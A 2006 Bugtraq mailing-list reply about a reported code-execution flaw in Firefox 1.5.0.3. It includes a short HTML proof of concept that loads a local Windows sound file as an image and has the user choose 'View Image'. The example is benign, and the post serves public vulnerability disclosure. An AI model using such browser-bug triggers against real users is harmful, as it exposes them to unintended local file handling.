
Date: Sun, 7 May 2006 00:16:23 +0100
From: James_gmail-ij <ij3n0spam@...il.com>
To: "yesn@...n.com" <yesn@...n.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Firefox 1.5.0.3 code execution exploit


On 5 May 2006 09:51:42 -0000, yesn@...n.com <yesn@...n.com> wrote:
> try this with Firefox 1.5.0.3
>
> »www.gavinsharp.com/tmp/ImageVuln.html
>

Windows Only - Yes?

<Head>
<Title>Bug 334341</Title>
</Head>

<Body>
<Img src="C:\WINDOWS\Media\ringin.wav"> right click the image and
select "View Image"
</Body>


